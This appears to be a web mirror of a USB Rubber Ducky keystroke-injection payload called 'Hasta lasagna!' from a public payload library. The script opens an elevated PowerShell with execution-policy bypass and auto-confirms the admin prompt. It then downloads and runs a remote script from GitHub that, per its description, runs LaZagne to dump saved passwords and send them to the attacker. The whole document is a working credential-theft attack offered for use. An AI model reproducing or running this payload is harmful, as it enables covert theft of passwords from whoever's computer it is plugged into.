Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/Hasta lasagna!/payload.txt
2968 views
1
REM TITLE "Hasta lasagna!"
2
REM AUTHOR m4ki3lf0
3
REM TARGET Approved on Win10, Probably working on Win11
4
REM DESCRIPTION This will download the password exfiltration script (your modified version for your preferred exfiltration method), download execute lazagne.exe save result to a file and send it to yourself
5
REM VERSION 1.0
6
7
DEFAULT_DELAY 300
8
DELAY 1000
9
GUI r
10
STRING powershell -exec bypass -NoP
11
CTRL SHIFT ENTER
12
DELAY 100
13
LEFT
14
ENTER
15
DELAY 100
16
STRING iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m4ki3lf0/BadUsbScripts/main/PasswordExfiltration/PasswordExfiltration.ps1')
17
ENTER
18
19